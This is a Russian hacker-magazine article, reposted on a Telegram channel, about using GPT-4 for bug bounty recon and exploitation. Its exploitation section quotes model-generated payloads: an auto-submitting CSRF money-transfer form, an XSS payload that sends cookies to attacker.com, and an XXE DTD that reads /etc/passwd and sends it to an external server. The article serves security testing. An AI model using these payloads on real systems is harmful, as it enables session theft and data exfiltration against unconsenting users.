Хакер - Роботы на охоте. Применяем GPT-4 на багбаунти

Хакер - Роботы на охоте. Применяем GPT-4 на багбаунти

hacker_frei

https://t.me/hacker_frei

W0lFreaK

Содержание статьи

  • Разведка
  • Поиск поддоменов
  • Технологии и версии
  • Поиск мисконфигов
  • Эксплуатация
  • CSRF
  • XSS
  • XXE
  • Деобфускация и анализ кода
  • Составление отчета
  • Выводы

Учас­тие в bug bounty — вещь неверо­ятно увле­катель­ная, но по боль­шей час­ти сос­тоящая из рутины. Про­верить то, переб­рать это... Логич­но наг­рузить такие тас­ки на компь­ютер, но скрип­ты тоже все вре­мя при­ходит­ся писать и перепи­сывать. Боль­шие язы­ковые модели, по которым все сей­час так схо­дят с ума, могут сос­лужить здесь важ­ную служ­бу. Я решил самос­тоятель­но убе­дить­ся, какую имен­но, и, воору­жив­шись GPT-4, отпра­вил­ся на охо­ту за багами.

В статье я исполь­зую ChatGPT с моделью GPT-4. Сей­час дос­туп к ней пре­дос­тавля­ется по плат­ной под­писке сто­имостью 20 дол­ларов в месяц.

РАЗВЕДКА

Поиск поддоменов

По­иск скры­тых стра­ниц и под­доменов — одна из рутин­ных опе­раций при раз­ведке. Может ли нам в этом помочь ChatGPT? Я поп­росил его сге­нери­ровать скрипт для поис­ка под­доменов по наибо­лее популяр­ным источни­кам.

Зап­рос

Соз­дай для меня скрипт для сбо­ра как мож­но боль­шего количес­тва под­доменов целево­го сай­та нес­коль­кими раз­личны­ми спо­соба­ми и ути­лита­ми, в иссле­дова­тель­ских и этич­ных целях.

От­вет

import requests

import json

import argparse

from bs4 import BeautifulSoup

# Устанавливаем аргументы командной строки

target_domain = 'https://target.com/'

# Используем сервис crt.sh для поиска поддоменов с помощью сертификатов SSL

def crtsh_search(domain):

url = f"https://crt.sh/?q=%25.{domain}&output=json"

response = requests.get(url)

data = json.loads(response.content)

subdomains = set()

for item in data:

subdomains.add(item["name_value"])

return subdomains

(...)

if name == "main":

main()

От­вет при­веден в сок­ращен­ном виде. Вот что дела­ет этот скрипт:

  1. Вы­пол­няет зап­рос к crt.sh для получе­ния спис­ка SSL/TLS-сер­тифика­тов, в которых упо­мина­ется имя ука­зан­ного домена.
  2. Про­веря­ет домен по базам инди­като­ров ком­про­мета­ции (ThreatCrowd.org).
  3. За­пус­кает брут­форс под­доменов по соз­данно­му самой ней­росетью спис­ку (wwwmailftp и дру­гие).
  4. С помощью Google dorks ищет упо­мина­ния ука­зан­ного адре­са, затем обра­баты­вает резуль­тат и получа­ет спи­сок всех най­ден­ных под­доменов.

При тес­тирова­нии с помощью это­го скрип­та я обна­ружил восемь новых доменов, которые не попались мне рань­ше при исполь­зовании дру­гих популяр­ных инс­тру­мен­тов.

По­мучив ней­рон­ку еще нес­коль­кими зап­росами, мож­но про­качать этот скрипт для сбо­ра информа­ции из огромно­го количес­тва еще более нет­риви­аль­ных источни­ков.

Технологии и версии

GPT-4 поможет опре­делить, какое прог­рам­мное обес­печение исполь­зует­ся на сай­те. Вот нес­коль­ко спо­собов, как это сде­лать.

  1. Под­сказ­ки по исполь­зуемым тех­нологи­ям: GPT-4 может пре­дос­тавить под­сказ­ки, методы и готовые зап­росы, что­бы опре­делить тех­нологии и их вер­сии.
  2. Со­веты по поис­ку фай­лов и дирек­торий: ней­рон­ка пред­ложит име­на фай­лов и дирек­торий, которые обыч­но свя­заны с опре­делен­ными тех­нологи­ями. Нап­ример, файл robots.txt или sitemap.xml может содер­жать информа­цию об исполь­зуемом прог­рам­мном обес­печении и его вер­сии, а стра­ницы wp-adminwp-json выдадут нам исполь­зование WordPress.
  3. Пред­ложение скрип­тов и инс­тру­мен­тов: GPT-4 соз­даст скрип­ты и пореко­мен­дует инс­тру­мен­ты, которые спо­соб­ны опре­делить тех­нологии и их вер­сии на веб‑сер­вере.

Мож­но поп­росить ChatGPT не прос­то опре­делить исполь­зуемый софт, а соз­дать под­ходящие скрип­ты. Нап­ример, ниже при­веден скрипт, который ChatGPT соз­дал для детек­тирова­ния опре­делен­ного набора JS-биб­лиотек, исполь­зуемых на сай­те. Давай поп­робу­ем!

Зап­рос

Соз­дай JS-скрипт для опре­деле­ния исполь­зуемых на сай­те JS-биб­лиотек.

От­вет

(function() {

const libraries = [

{ name: "jQuery", object: "jQuery" },

{ name: "React", object: "React" },

{ name: "AngularJS", object: "angular" },

{ name: "Vue", object: "Vue" },

// Добавь другие библиотеки здесь, если необходимо

];

(...)

} else {

results.forEach((lib) => {

console.log(`${lib.name}: ${lib.version}`);

});

}

}

const detectedLibraries = detectLibraries();

displayResults(detectedLibraries);

})();

Как показа­ла прак­тика, такой под­ход помога­ет выявить боль­ше исполь­зуемых в дан­ный момент биб­лиотек, чем зна­ют пуб­личные сер­висы вро­де BuiltWith. Так­же он поз­воля­ет получить све­дения о тех­нологи­ях любой стра­ницы сай­та, а не толь­ко дос­тупных без авто­риза­ции. Фун­кци­ональ­ность и перечень детек­тиру­емых сге­нери­рован­ным скрип­том биб­лиотек не дотяги­вает до всем извес­тно­го Wappalyzer, одна­ко по нашему зап­росу ней­рон­ка может модифи­циро­вать скрипт и интегри­ровать в него воз­можность опре­деле­ния пуб­личных уяз­вимос­тей в выяв­ленных биб­лиоте­ках с помощью Vulners или Mitre.

Мож­но исполь­зовать ней­росеть и прос­то для соз­дания дор­ков, что­бы эффектив­нее искать информа­цию о целевых сис­темах.

Зап­рос

На­пиши зап­рос с исполь­зовани­ем Google dorks для опре­деле­ния веб‑сай­тов, исполь­зующих CMS Bitrix.

От­вет

inurl:/bitrix/ intitle:bitrix filetype:php intitle:"Bitrix" "bitrix_sessid"

Ес­ли ввес­ти такой зап­рос в Google, то это поз­волит получить стра­ницы:

  • inurl: Bitrix — в URL которых содер­жится /bitrix/ (харак­терный приз­нак сай­тов, работа­ющих на «Бит­рикс»);
  • intitle: Bitrix — в заголов­ках которых встре­чает­ся сло­во Bitrix;
  • bitrix_sessid — на которых исполь­зует­ся дан­ный параметр, сви­детель­ству­ющий об исполь­зовании «Бит­рикс»;
  • filetype: php — слу­жит для исклю­чения веб‑сай­тов, написан­ных на нетипич­ных для «Бит­рикс» язы­ках прог­рамми­рова­ния, но под­ходящих под про­чие парамет­ры зап­роса. 

ПОИСК МИСКОНФИГОВ

Еще один вари­ант исполь­зования ChatGPT — ана­лиз кор­рек­тнос­ти воз­вра­щаемых сер­вером заголов­ков безопас­ности. Ты можешь пре­дос­тавить заголов­ки отве­та сер­вера, и ChatGPT про­ана­лизи­рует их, выявив отсутс­тву­ющие или некор­рек­тные заголов­ки, которые могут озна­чать наличие уяз­вимос­тей (нап­ример, мис­конфи­гура­ции CORS и CSP).

Зап­рос

Веб‑сер­вер в ответ на мой зап­рос вер­нул сле­дующие заголов­ки. Под­ска­жи, безопас­на ли дан­ная кон­фигура­ция? Какие заголов­ки отсутс­тву­ют или нас­тро­ены небезо­пас­но?

HTTP/2 200 OK

Server: nginx

Date: Sat, 08 Apr 2023 18:49:17 GMT

От­вет

Кон­фигура­ция заголов­ков, пре­дос­тавлен­ная сер­вером, вклю­чает в себя ряд мер по обес­печению безопас­ности, но некото­рые важ­ные заголов­ки отсутс­тву­ют. Вот крат­кий ана­лиз пре­дос­тавлен­ных заголов­ков:

X-Xss-Protection: 1; mode=block — заголо­вок X-XSS-Protection пре­дот­вра­щает отра­жен­ные меж­сай­товые скрип­ты (XSS). Зна­чение «1; mode=block» ука­зыва­ет бра­узе­ру бло­киро­вать ответ, если обна­руже­на XSS.

X-Frame-Options: SAMEORIGIN — заголо­вок X-Frame-Options пре­дот­вра­щает клик­дже­кинг путем огра­ниче­ния встра­ива­ния кон­тента сай­та на дру­гие сай­ты. Зна­чение SAMEORIGIN ука­зыва­ет, что сайт может быть встро­ен толь­ко на стра­ницы с того же источни­ка.

Content-Security-Policy (CSP) — заголо­вок CSP поз­воля­ет ука­зать источни­ки кон­тента для раз­личных типов ресур­сов, что огра­ничи­вает воз­можнос­ти для XSS и дру­гих атак. Нап­ример, Content-Security-Policy: default-src 'self'; img-src *; media-src media1.com media2.com; script-src userscripts.example.com.

Strict-Transport-Security (HSTS) — заголо­вок HSTS ука­зыва­ет бра­узе­ру исполь­зовать толь­ко HTTPS-соеди­нения для обще­ния с сай­том на опре­делен­ный пери­од. Это помога­ет пре­дот­вра­тить ата­ки man in the middle и улуч­шает безопас­ность сай­та. Нап­ример, Strict-Transport-Security: max-age=31536000; includeSubDomains.

X-Content-Type-Options — заголо­вок X-Content-Type-Options пре­дот­вра­щает ата­ки на осно­ве MIME-типа путем зап­рета бра­узе­ру интер­пре­тиро­вать докумен­ты с неп­равиль­ным типом.

Мож­но отме­тить, что отсутс­твие допол­нитель­ных заголов­ков безопас­ности, таких как Content-Security-Policy, X-Content-Type-Options, X-XSS-Protection, X-Frame-Options, может озна­чать отсутс­твие допол­нитель­ной защиты от некото­рых типов атак, таких как ата­ки XSS, клик­дже­кинг, MIME-Sniffing и дру­гие.

Так­же наличие допол­нитель­ных заголов­ков безопас­ности, таких как Strict-Transport-Security, может ука­зывать на то, что при­ложе­ние исполь­зует защищен­ное соеди­нение и перенап­равля­ет все HTTP-зап­росы на HTTPS. Одна­ко в дан­ном слу­чае таких заголов­ков нет, и это может озна­чать, что при­ложе­ние не защище­но от атак перех­вата тра­фика (man in the middle).

Об­ращение к ней­рон­ке за помощью с заголов­ками поз­воля­ет очень быс­тро под­све­тить мис­конфи­ги и пред­положить потен­циаль­ные век­торы ата­ки.

Из плю­сов: она может пред­положить нап­равле­ния ата­ки на при­ложе­ние и под­ска­зать кон­крет­ные вари­анты обхо­да текущих огра­ниче­ний, в час­тнос­ти это будет полез­но для обхо­да CSP. 

ЭКСПЛУАТАЦИЯ

CSRF

CSRF (cross-site request forgery) — уяз­вимость, при которой зло­умыш­ленник может зас­тавить поль­зовате­ля выпол­нить нежела­тель­ные дей­ствия на сай­те, где поль­зователь аутен­тифици­рован. Для это­го соз­дает­ся вре­донос­ный зап­рос, исполне­ние которо­го при­водит к совер­шению дей­ствия от име­ни поль­зовате­ля без его ведома.

Ес­ли про­ще, зло­умыш­ленник соз­дает на сво­ем сай­те скрипт, который выпол­няет зап­рос на адрес вро­де такого:

www.victim_bank.com/transfer_all_money?toAccount=1337

Ког­да жер­тва посетит стра­ницу с этим скрип­том, он выпол­нится в бра­узе­ре, возь­мет куки и выпол­нит зап­рос на ука­зан­ный адрес. В резуль­тате ата­ки все день­ги со сче­та жер­твы будут переве­дены на ука­зан­ный акка­унт.

Зап­рос

У меня есть HTTP-зап­рос, сге­нери­руй CSRF PoC для него.

POST http://victim_bank.com/transfer_all_money HTTP/1.1

Host: victim_bank.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537

x-browser: Chrome

Referer: victim_bank.com

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 14

toAccount=1337

От­вет

POC-code для пре­дос­тавлен­ного зап­роса:

<html>

<head>

<title>CSRF PoC</title>

</head>

<body>

<h1>CSRF PoC</h1>

<form action="http://victim_bank.com/transfer_all_money" method="POST" id="csrf-form">

<input type="hidden" name="toAccount" value="1337">

</form>

<script>

// Submit the form as soon as the page loads

document.addEventListener("DOMContentLoaded", function() {

document.getElementById("csrf-form").submit();

});

</script>

</body>

</html>

Да­вай подума­ем, как ChatGPT может быть здесь нам полезен. Я вижу такие вари­анты:

  1. Соз­дание proof of concept (PoC) для демонс­тра­ции CSRF-уяз­вимос­ти: ты можешь пре­дос­тавить информа­цию о зап­росе или фор­ме, и ChatGPT соз­даст HTML-стра­ницу или код на JavaScript, который будет генери­ровать под­дель­ный зап­рос, ими­тиру­ющий дей­ствие поль­зовате­ля.
  2. Объ­ясне­ние и пред­ложение решений: ChatGPT может пре­дос­тавить деталь­ное объ­ясне­ние того, как работа­ет CSRF-уяз­вимость, и пред­ложить спо­собы обна­руже­ния и пре­дот­вра­щения таких уяз­вимос­тей на сер­вере. Это может вклю­чать рекомен­дации по исполь­зованию CSRF-токенов, про­вер­ке HTTP-заголов­ков и дру­гим методам защиты.
  3. По­мощь в иден­тифика­ции потен­циаль­ных уяз­вимых мест: ИИ най­дет учас­тки кода или фун­кции веб‑при­ложе­ния, которые могут быть уяз­вимыми перед CSRF-ата­ками, а так­же ука­жет на методы тес­тирова­ния и обна­руже­ния таких уяз­вимос­тей.

XSS

XSS (cross-site scripting) — уяз­вимость, поз­воля­ющая зло­умыш­ленни­ку внед­рить вре­донос­ный код (обыч­но JavaScript) на веб‑стра­ницу, которую прос­матри­вают дру­гие поль­зовате­ли. Так зло­умыш­ленник может получить дос­туп к кон­фиден­циаль­ной информа­ции, нап­ример куки, или выпол­нить про­изволь­ные дей­ствия от име­ни поль­зовате­ля без его ведома.

Воз­можные вари­анты при­мене­ния ChatGPT:

  1. Соз­дание PoC для демонс­тра­ции XSS-уяз­вимос­ти. Ты можешь пре­дос­тавить информа­цию о мес­те, где обна­руже­на уяз­вимость, и ChatGPT соз­даст при­мер вре­донос­ного кода на JavaScript, который будет ее экс­плу­ати­ровать.
  2. Соз­дание вре­донос­ной наг­рузки, реали­зующей заложен­ный алго­ритм для получе­ния тре­буемо­го импакта от экс­плу­ата­ции уяз­вимос­ти.

Нап­ример, нам нуж­но, что­бы в резуль­тате экс­плу­ата­ции уяз­вимос­ти и исполне­ния нашей наг­рузки куки поль­зовате­ля отправ­лялись на под­кон­троль­ный нам сер­вер. ChatGPT с радостью сге­нери­рует нам такую наг­рузку.

Зап­рос

У меня есть Reflected XSS по такому адре­су:

server.com/?...original_path=javascript%3aalert(1)%2f%2frb0iabdd

Сде­лай так, что­бы резуль­татом ее экс­плу­ата­ции была отправ­ка cookie посети­теля на адрес attacker.com.

От­вет

В качес­тве зна­чения парамет­ра original_path под­ставь­те сле­дующую фун­кцию:

javascript: (function() {

var xhr = new XMLHttpRequest();

xhr.open('GET', 'https://attacker.com/collect?cookie=' + encodeURIComponent(document.cookie), true);

xhr.send();

})(); 

XXE

XXE (XML external entity) — это уяз­вимость, которая воз­ника­ет при обра­бот­ке докумен­тов XML с под­клю­чен­ными внеш­ними ресур­сами. Если сер­вер неп­равиль­но обра­баты­вает такие сущ­ности (entities), зло­умыш­ленник может исполь­зовать XXE-уяз­вимос­ти для чте­ния локаль­ных фай­лов, ска­ниро­вания внут­ренних сис­тем, выпол­нения зап­росов к внут­ренним сер­висам или про­веде­ния DoS-атак.

Ней­росеть поможет с XXE сле­дующим обра­зом:

  1. ChatGPT может сос­тавить наг­рузки для экс­плу­ата­ции XXE, соз­давая раз­ные вари­анты XML-докумен­тов и DTD-фай­лов. Нам же оста­нет­ся толь­ко про­тес­тировать их на механиз­мах защиты уяз­вимого.
  2. ИИ может под­робно рас­ска­зать, как работа­ет XXE-уяз­вимость, и пред­ложить спо­собы обна­руже­ния и пре­дот­вра­щения таких уяз­вимос­тей на сер­вере.

При­веду при­мер.

Зап­рос

У меня есть сле­дующая струк­тура фай­ла:

<?xml version="1.0" encoding="UTF-8"?>

<users>

<user>

<username>aaaaaaaaaaaaaa</username>

<email>bbbbbbbbbbbbbbb</email>

</user>

</users>

Я знаю, что здесь есть XXE-уяз­вимость. Одна­ко для экс­плу­ата­ции мне необ­ходимо под­клю­чить DTD-файл, рас­положен­ный на моем сер­вере. Сге­нери­руй наг­рузку и DTD-файл, поз­воля­ющий выпол­нить чте­ние локаль­ного фай­ла /etc/passwd.

От­вет

Для экс­плу­ата­ции XXE-уяз­вимос­ти и под­клю­чения внеш­него DTD-фай­ла с вашего сер­вера вы можете исполь­зовать сле­дующую наг­рузку:

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE users SYSTEM "http://your-server-url/your-dtd-file.dtd">

<users>

<user>

<username>aaaaaaaaaaaaaa</username>

<email>bbbbbbbbbbbbbbb</email>

</user>

</users>

Что­бы про­читать локаль­ный файл /etc/passwd с исполь­зовани­ем XXE-уяз­вимос­ти и внеш­него DTD-фай­ла, соз­дай­те сле­дующий DTD-файл:

<!ENTITY % data SYSTEM "file:///etc/passwd">

<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://your-server-url/collect?data=%data;'>">

%param1; 

Деобфускация и анализ кода

Ис­поль­зовать ней­росеть мож­но и для авто­мати­чес­кого ана­лиза кода — что­бы про­верить прог­рамму на уяз­вимос­ти. ChatGPT про­информи­рует о потен­циаль­ных сла­бых мес­тах и проб­лемах безопас­ности. Нап­ример, скор­ми ней­росети исходный код нес­коль­ких вза­имос­вязан­ных сер­висов, и она пос­тара­ется ука­зать на SQL-инъ­екции, CRLF, cross-site scripting, SSTI и мно­гие дру­гие воз­можные проб­лемы.

Еще ней­росеть будет полез­на для деоб­фуска­ции. Обфусци­рован­ный код сей­час мож­но встре­тить в любом мобиль­ном или веб‑при­ложе­нии. Обыч­но это зат­рудня­ет ана­лиз прог­раммы, но ней­росеть может рас­путать всё, что люди запута­ли.

Сей­час ChatGPT уме­ет раз­ворачи­вать обфусци­рован­ный код в обыч­ный исходник толь­ко в самых прос­тых слу­чаях, но даже в слож­ных она серь­езно помога­ет реконс­тру­иро­вать код и зна­читель­но повысить понят­ность алго­рит­ма.

Поп­робу­ем на прак­тике.

Зап­рос

Де­обфусци­руй код на JS:

x='',X=!x+x,xx=!X+x,xX=x+{},Xx=X[x++],XX=X[Xxx=x],

XxX=++Xxx+x,xxx=xX[Xxx+XxX],

X[xxx+=xX[x]+(X.xx+xX)[x]+xx[XxX]+Xx+XX+X[Xxx]+

xxx+Xx+xX[x]+XX][xxx](xx[x]+xx[Xxx]+X[XxX]+XX+Xx+"(x)")()

Фраг­мент отве­та

const emptyString = '';

const _true = 'true';

const _false = 'false';

const objectString = '[object Object]';

const t = 't';

const r = 'r';

const c = 'c';

const constructorString = 'constructor';

const alertFunction = Function('alert(x)');

alertFunction();

Итак, дан­ный код соз­дает и выпол­няет фун­кцию, которая вызыва­ет alert(x), где x — пус­тая стро­ка. 

СОСТАВЛЕНИЕ ОТЧЕТА

Нель­зя забывать, что, кро­ме тех­ничес­кой час­ти, ChatGPT поз­воля­ет авто­мати­зиро­вать самую рутин­ную часть любого иссле­дова­ния — написа­ние отче­та.

Дос­таточ­но ука­зать, какой тип уяз­вимос­ти, в каком парамет­ре и на каком URL был выяв­лен, что­бы получить пол­ное, деталь­ное опи­сание уяз­вимос­ти и рекомен­дации, как ее испра­вить.

Зап­рос

Я обна­ружил Reflected XSS в панели адми­нис­три­рова­ния сай­та по такому адре­су:

https://website.com/admin/path?parameter=<script>alert(1)</script>

На­пиши отчет для баг­баун­ти‑прог­раммы по этой уяз­вимос­ти.

От­вет

Крат­кое опи­сание: я обна­ружил уяз­вимость отра­жен­ного кросс‑сай­тового скрип­тинга (XSS) в панели адми­нис­тра­тора сай­та (...). Эта уяз­вимость поз­воля­ет зло­умыш­ленни­ку внед­рять вре­донос­ные скрип­ты, что может при­вес­ти к рас­кры­тию кон­фиден­циаль­ной информа­ции или несан­кци­они­рован­ным дей­стви­ям от име­ни жертв.

Ша­ги для вос­про­изве­дения: (...)

Воз­дей­ствие: уяз­вимость XSS поз­воля­ет зло­умыш­ленни­ку выпол­нять про­изволь­ный JavaScript-код в кон­тек­сте бра­узе­ра жер­твы, что потен­циаль­но может при­вес­ти к рас­кры­тию кон­фиден­циаль­ной информа­ции (нап­ример, сес­сион­ных кук, токенов CSRF) или несан­кци­они­рован­ным дей­стви­ям от име­ни жер­твы (нап­ример, изме­нение поль­зователь­ских дан­ных или нас­тро­ек).

Ре­комен­дации: для устра­нения этой уяз­вимос­ти рекомен­дует­ся кор­рек­тно про­верять вход­ные дан­ные и кодиро­вать вывод дан­ных, пре­дос­тавлен­ных поль­зовате­лем, осо­бен­но в парамет­рах URL. Кро­ме того, рас­смот­рите воз­можность при­мене­ния политик безопас­ности содер­жимого (CSP) для пре­дот­вра­щения выпол­нения неав­торизо­ван­ных скрип­тов.

Ссыл­ки:

  1. CWE-79: Неп­равиль­ное обез­вре­жива­ние вво­да при генера­ции веб‑стра­ницы «Кросс‑сай­товый скрип­тинг»
  2. Стан­дарт верифи­кации безопас­ности при­ложе­ний OWASP (ASVS) 3.1: Про­вер­ка вво­да

ВЫВОДЫ

В течение нес­коль­ких недель я активно баг­хантил и упро­щал свою деятель­ность с помощью ChatGPT. За этот пери­од на прос­торах интерне­та появи­лись новые наработ­ки: по интегра­ции ChatGPT с Burp Suite, Nessus и дру­гими инс­тру­мен­тами нас­тупатель­ной безопас­ности.

Ду­маю, боль­шие язы­ковые модели ско­ро будут при­менять­ся пов­семес­тно, вклю­чая, конеч­но же, сфе­ры ИТ и ИБ. Да, зачас­тую ней­росеть не дает пол­ный, кор­рек­тный и под­робный ответ с пер­вого раза и лишь отве­чает общи­ми фра­зами. Это тре­бует от ауди­тора опре­делен­ных зна­ний, к тому же нуж­но быть готовым при­менять и дру­гие инс­тру­мен­ты, при­чем иног­да кре­атив­но (с чем у ИИ пока проб­лемы). Тем не менее стать мам­киным кул­хацке­ром с таким помощ­ником будет про­ще, чем ког­да‑либо.

Читайте ещё больше платных статей бесплатно: https://t.me/hacker_frei



Report Page